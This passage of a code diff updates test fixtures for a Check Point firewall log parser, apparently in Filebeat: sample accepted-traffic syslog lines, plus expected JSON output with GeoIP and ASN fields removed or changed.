 <134>1 2020-03-29T23:27:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812efa,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52344"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:27:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812efa,0x3,0x353707c7,0xee78a1dc}";
origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61472"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10900"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T23:27:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812efa,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45922"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:27:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812efa,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network";
layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41392"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10901"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T23:28:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812f03,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524483"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44152"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:28:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812f03,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524483"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44152"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1
2020-03-29T23:28:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812f10,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"83.98.201.134"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50523"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T23:28:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812f10,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524496"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40246"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T23:28:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812f1a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 &
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524506"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37140"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:28:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812f10,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524496"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40246"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:28:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812f1a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524506"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37140"; service:"53";
service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:28:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812f1a,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51575"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:28:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812f1a,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50946"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:28:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812f1a,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 &
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54800"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10902"; xlatesrc:"0.0.0.0"]
diff --git a/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint.log-expected.json b/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint.log-expected.json
index b9f1c2c5bfb5..efe6fd5d6dab 100644
--- a/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint.log-expected.json
+++ b/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint.log-expected.json
@@ -145,16 +145,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 26680,
 "client.port": 61794,
- "destination.as.number": 25046,
- "destination.as.organization.name": "Check Point Software Technologies LTD",
- "destination.geo.city_name": "Tel Aviv",
- "destination.geo.continent_name": "Asia",
- "destination.geo.country_iso_code": "IL",
- "destination.geo.country_name": "Israel",
- "destination.geo.location.lat": 32.0678,
- "destination.geo.location.lon": 34.7647,
- "destination.geo.region_iso_code": "IL-TA",
- "destination.geo.region_name": "Tel Aviv",
 "destination.ip": "194.29.39.10",
 "destination.port": 443,
 "event.action": "Accept",
@@ -267,13 +257,8 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 10012,
 "client.port": 41566,
- "destination.as.number": 16625,
+ "destination.as.number": 35994,
 "destination.as.organization.name": "Akamai Technologies, Inc.",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "104.99.234.45",
 "destination.port": 443,
 "event.action": "Accept",
@@ -386,13 +371,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 10013,
 "client.port": 48698,
- "destination.as.number": 30148,
- "destination.as.organization.name": "Sucuri",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "192.124.249.31",
 "destination.port": 80,
 "event.action": "Accept",
@@ -505,13 +483,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 10014,
 "client.port": 61150,
- "destination.as.number": 30148,
- "destination.as.organization.name": "Sucuri",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "192.124.249.36",
 "destination.port": 80,
 "event.action": "Accept",
@@ -624,13 +595,8 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 26681,
 "client.port": 55110,
- "destination.as.number": 16625,
+ "destination.as.number": 35994,
 "destination.as.organization.name": "Akamai Technologies, Inc.",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "104.81.142.43",
 "destination.port": 443,
 "event.action": "Accept",
@@ -743,13 +709,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 26682,
 "client.port": 48718,
- "destination.as.number": 30148,
- "destination.as.organization.name": "Sucuri",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "192.124.249.31",
 "destination.port": 80,
 "event.action": "Accept",
@@ -862,13 +821,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 26683,
 "client.port": 62206,
- "destination.as.number": 30148,
- "destination.as.organization.name": "Sucuri",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "192.124.249.41",
 "destination.port": 80,
 "event.action": "Accept",
@@ -981,13 +933,8 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 26684,
 "client.port": 41596,
- "destination.as.number": 16625,
+ "destination.as.number": 35994,
 "destination.as.organization.name": "Akamai Technologies, Inc.",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "104.99.234.45",
 "destination.port": 443,
 "event.action": "Accept",
@@ -1100,13 +1047,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 10015,
 "client.port": 61180,
- "destination.as.number": 30148,
- "destination.as.organization.name": "Sucuri",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "192.124.249.36",
 "destination.port": 80,
 "event.action": "Accept",
@@ -1219,13 +1159,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 10016,
 "client.port": 48732,
- "destination.as.number": 30148,
- "destination.as.organization.name": "Sucuri",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "192.124.249.31",
 "destination.port": 80,
 "event.action": "Accept",
@@ -1338,13 +1271,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 43354,
 "client.port": 62222,
- "destination.as.number": 30148,
- "destination.as.organization.name": "Sucuri",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "192.124.249.41",
 "destination.port": 80,
 "event.action": "Accept",
@@ -1457,13 +1383,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 10017,
 "client.port": 61188,
- "destination.as.number": 30148,
- "destination.as.organization.name": "Sucuri",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "192.124.249.36",
 "destination.port": 80,
 "event.action": "Accept",
@@ -1576,13 +1495,8 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 26685,
 "client.port": 41624,
- "destination.as.number": 16625,
+ "destination.as.number": 35994,
 "destination.as.organization.name": "Akamai Technologies, Inc.",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "104.99.234.45",
 "destination.port": 443,
 "event.action": "Accept",
@@ -1695,13 +1609,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 10018,
 "client.port": 48758,
- "destination.as.number": 30148,
- "destination.as.organization.name": "Sucuri",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "192.124.249.31",
 "destination.port": 80,
 "event.action": "Accept",
@@ -1814,13 +1721,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 10019,
 "client.port": 62246,
- "destination.as.number": 30148,
- "destination.as.organization.name": "Sucuri",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "192.124.249.41",
 "destination.port": 80,
 "event.action": "Accept",
@@ -1933,13 +1833,8 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 10020,
 "client.port": 41638,
- "destination.as.number": 16625,
+ "destination.as.number": 35994,
 "destination.as.organization.name": "Akamai Technologies, Inc.",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "104.99.234.45",
 "destination.port": 443,
 "event.action": "Accept",
@@ -2052,13 +1947,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 43355,
 "client.port": 61224,
- "destination.as.number": 30148,
- "destination.as.organization.name": "Sucuri",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "192.124.249.36",
 "destination.port": 80,
 "event.action": "Accept",
@@ -2219,13 +2107,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 43356,
 "client.port": 48776,
- "destination.as.number": 30148,
- "destination.as.organization.name": "Sucuri",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "192.124.249.31",
 "destination.port": 80,
 "event.action": "Accept",
@@ -2311,16 +2192,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 26686,
 "client.port": 51436,
- "destination.as.number": 25046,
- "destination.as.organization.name": "Check Point Software Technologies LTD",
- "destination.geo.city_name": "Tel Aviv",
- "destination.geo.continent_name": "Asia",
- "destination.geo.country_iso_code": "IL",
- "destination.geo.country_name": "Israel",
- "destination.geo.location.lat": 32.0678,
- "destination.geo.location.lon": 34.7647,
- "destination.geo.region_iso_code": "IL-TA",
- "destination.geo.region_name": "Tel Aviv",
 "destination.ip": "194.29.39.47",
 "destination.port": 443,
 "event.action": "Accept",
@@ -2541,13 +2412,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 26687,
 "client.port": 62396,
- "destination.as.number": 30148,
- "destination.as.organization.name": "Sucuri",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "192.124.249.41",
 "destination.port": 80,
 "event.action": "Accept",
@@ -2660,13 +2524,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 26688,
 "client.port": 48914,
- "destination.as.number": 30148,
- "destination.as.organization.name": "Sucuri",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "192.124.249.31",
 "destination.port": 80,
 "event.action": "Accept",
@@ -2779,13 +2636,8 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 10021,
 "client.port": 41844,
- "destination.as.number": 16625,
+ "destination.as.number": 35994,
 "destination.as.organization.name": "Akamai Technologies, Inc.",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "104.99.234.45",
 "destination.port": 443,
 "event.action": "Accept",
@@ -2898,13 +2750,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 26689,
 "client.port": 62468,
- "destination.as.number": 30148,
- "destination.as.organization.name": "Sucuri",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "192.124.249.41",
 "destination.port": 80,
 "event.action": "Accept",
@@ -3017,13 +2862,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 26690,
 "client.port": 61434,
- "destination.as.number": 30148,
- "destination.as.organization.name": "Sucuri",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "192.124.249.36",
 "destination.port": 80,
 "event.action": "Accept",
@@ -3136,13 +2974,8 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 26691,
 "client.port": 41856,
- "destination.as.number": 16625,
+ "destination.as.number": 35994,
 "destination.as.organization.name": "Akamai Technologies, Inc.",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "104.99.234.45",
 "destination.port": 443,
 "event.action": "Accept",
@@ -3303,13 +3136,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 26692,
 "client.port": 48990,
- "destination.as.number": 30148,
- "destination.as.organization.name": "Sucuri",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "192.124.249.31",
 "destination.port": 80,
 "event.action": "Accept",
@@ -3422,13 +3248,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 26693,
 "client.port": 62478,
- "destination.as.number": 30148,
- "destination.as.organization.name": "Sucuri",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "192.124.249.41",
 "destination.port": 80,
 "event.action": "Accept",
@@ -3541,13 +3360,8 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 10022,
 "client.port": 41864,
- "destination.as.number": 16625,
+ "destination.as.number": 35994,
 "destination.as.organization.name": "Akamai Technologies, Inc.",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "104.99.234.45",
 "destination.port": 443,
 "event.action": "Accept",
@@ -3660,13 +3474,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 43357,
 "client.port": 61446,
- "destination.as.number": 30148,
- "destination.as.organization.name": "Sucuri",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "192.124.249.36",
 "destination.port": 80,
 "event.action": "Accept",
@@ -3779,13 +3586,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 43358,
 "client.port": 48998,
- "destination.as.number": 30148,
- "destination.as.organization.name": "Sucuri",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "192.124.249.31",
 "destination.port": 80,
 "event.action": "Accept",
@@ -3844,13 +3644,8 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 43359,
 "client.port": 41870,
- "destination.as.number": 16625,
+ "destination.as.number": 35994,
 "destination.as.organization.name": "Akamai Technologies, Inc.",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "104.99.234.45",
 "destination.port": 443,
 "event.action": "Accept",
@@ -4017,13 +3812,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 26694,
 "client.port": 62488,
- "destination.as.number": 30148,
- "destination.as.organization.name": "Sucuri",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "192.124.249.41",
 "destination.port": 80,
 "event.action": "Accept",
@@ -4136,13 +3924,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 10023,
 "client.port": 61454,
- "destination.as.number": 30148,
- "destination.as.organization.name": "Sucuri",
- "destination.geo.continent_name": "North America",
